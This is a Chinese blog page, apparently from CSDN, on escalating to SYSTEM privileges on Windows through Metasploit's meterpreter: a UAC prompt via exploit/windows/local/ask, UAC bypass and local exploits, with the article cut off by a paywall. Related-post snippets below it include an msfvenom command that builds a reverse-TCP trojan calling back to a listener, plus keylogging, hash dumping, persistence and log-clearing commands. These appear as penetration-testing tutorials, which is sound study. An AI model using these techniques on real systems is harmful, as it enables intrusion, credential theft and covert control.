后渗透通过meterpreter模块提权

最新推荐文章于 2024-08-27 23:48:06 发布
原创 最新推荐文章于 2024-08-27 23:48:06 发布 · 1.1k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍在Windows系统中三种提权方法:提高程序运行级别、UAC绕过及利用本地提权漏洞。通过具体实例和Msf模块演示如何从低权限账户获取system权限。

继上一篇得到的普通session进行提权
在这里插入图片描述

提权方法:
一.提高程序的运行级别(uac)
说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高权限的shell
Msf模块:
Exploit/windows/local/ask
1.试试看可不可以直接得到system权限
在这里插入图片描述

发现有报错
2.然后先把meterpreter这个session放到后台
在这里插入图片描述

3.加载此模块
在这里插入图片描述

Info可查看模块描述
在这里插入图片描述

用更高等级的水平去执行bypass低等级的uac设置
4.设置当前需要提权的session

最低0.47元/天 解锁文章
Metasploit 后渗透攻击模块
悦分享
11-30 957
在上图中,我们使用channel –1命令列出了所有可用的通信信道,然后使用channel –r [channel-id]命令选择了读取数据的通信信道。Meterpreter的另一个强大功能是可以计算出目标系统的闲置时间,以此推算用户的使用时间表,从而在用户不怎么使用计算机的时间段发起攻击。使用enumdesktops和getdesktop命令可以查看被渗透主机的桌面信息:enumdesktops命令列出了所有可以访问的桌面,而getdesktop列出了当前桌面的相关信息。可以如下图所示使用这个模块
meterpreter渗透阶段的基本操作(一)
zwish的信安之路
12-28 1652
这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题 1、shell里的中文乱码 获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码 解决方法:在输入shell之后,再输入chcp 65001 2、相关的问题 getuid发现不是管理员权限,使用getsystem命令(不使用参数默认使用全部方法)会报错,不成功、 (方式:1、g...
渗透测试-[Meterpreter渗透25招]
m0_43405474的博客
05-07 3587
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
Meterpreter详解
devil8123665的博客
12-06 1960
转载https://www.cnblogs.com/backlion/p/9484950.html 0x01 Meterpreter自动 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/me
Windows网络服务渗透测试实战-Meterpreter渗透
c_lanxiaofang的博客
05-17 3000
一、实验项目名称 Windows网络服务渗透测试实战-Meterpreter渗透 二、实验目的及要求 掌握对MS17-010漏洞攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 三、复现步骤(附加文字说明加截图) 1、查看系统信息 屏幕快照 上传 下载 密码获取 Administrator:500:aad3b435b51404eeaad3b...
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
本课程主要讲解如何使用Meterpreter模块进行后渗透测试。 首先,了解MeterpreterMeterpreter是一种动态的、交互式的远程控制工具,它是Metasploit框架的一部分。它可以在多种操作系统上运行,包括Windows、Linux...
meterpreter渗透模块最新实操视频
11-02
这个教程主要侧重于内网渗透metasploit中的meterete视频实操,小编自认为不错,因为免费分享给更多人学习,想学习更多内容下载后按照向导关注我们的自媒体平台即可,谢谢支持!
Meterpreter渗透模块命令字典
m0_57221101的博客
04-14 872
一.系统命令 1.快捷操作 此板块用于记录用于操作meterpreter的指令 sessions #查看全部会话 –h 查看帮助 sessions -i <shell ID> #进入会话 -k 杀死会话 background #将当前会话放置后台 run #执行已有的模块,输入run后按两下tab,列出已有的脚本 info #查看已有模块信息 2.基础系统命令 getuid # 查看权限 getpid # 获取当前进程的pid sysinfo # 查看目标机系
Meterpreter
eli的博客
05-20 2671
0x01 Meterpreter自动 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
渗透测试常用工具-使用meterpreter模块进行后渗透测试
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
10-24 1740
再然后使用命令keyscan_start对键盘进行监听,使用命令keyscan_dump保存截获的键盘信息(注:windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。第五步,使用info windows/meterpreter/reverse_tcp命令来查看攻击载荷模块的具体信息,该模块适用于Windows x86平台不需要admin权限便可以运行,大小为281字节,需要配置三个参数分别为退出的方式、监听的地址、监听的端口号、EXITFUNC。
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4857
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制,如果管理员将利用的
渗透
ppbgi的博客
05-18 415
信息收集命令 systeminfo 打印系统信息 whoami/priv 当前帐户权限 ipconfig/dispalydns 显示dns信息 route print 打印路由表 arp -a 打印arp表 net user 列出表名 net user username 关于用户的信息 net use \SMBPATH Pa$$wOrd/u:username 连接SMB net localgroup 列出所有组 net view\127.0.0.1 会话打开到当前计算
利用meterperter进行win7系统
weixin_63137680的博客
10-30 2032
利用meterpreter对win7系统进行
渗透权限升(2)
qq_52178795的博客
07-13 329
渗透权限
meterpreter小结
MercyLin的博客
09-05 3214
经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行 首先我们可以输入getuid来查看当前用户的权限~ 可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其升到system权限. getsystem自动 输入getsystem来尝试,MSF会自动选择合适的方式来升当前权限 这个就比较玄学,我还没成功过,可以看到g...
Metasploit之——其他后渗透模块
冰河的专栏
01-27 1199
转载请注明出处:https://blog.youkuaiyun.com/l1028386804/article/details/86669253 1.收集无线SSID信息 run post/windows/wlan/wlan_bss_list meterpreter &gt; run post/windows/wlan/wlan_bss_list 2.收集无线Wifi密码 run post/wi...
渗透攻击命令和模块
Cwillchris的博客
04-12 1562
通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块 一、命令 1、arp 查看内网主机 2、background 将当前的会话转在后台运行。从而进行新的渗透测试。 如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令 3、clearev 清除系统,软件之类的所有登陆信息 4、download、upload download可以下载目标系统的文件 upload可以上传本机文件到目标系统
【后渗透模块-权限升】
最新发布
m0_73767222的博客
08-27 1201
本文详细演示了如何在上传木马之后进行权限升,分别使用高程序的运行级别,UAC绕过,利用本地漏洞进行这三种方法进行权限升。
渗透测试实战:Meterpreter模块Windows渗透中的应用
本篇文档主要介绍了在E026-渗透测试常用工具的课程中,如何通过Meterpreter模块进行后渗透测试。课程围绕实际操作展开,涉及到了一个安全研究与渗透测试的情境,具体步骤如下: 1. **课程背景与环境**: 学员需要...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值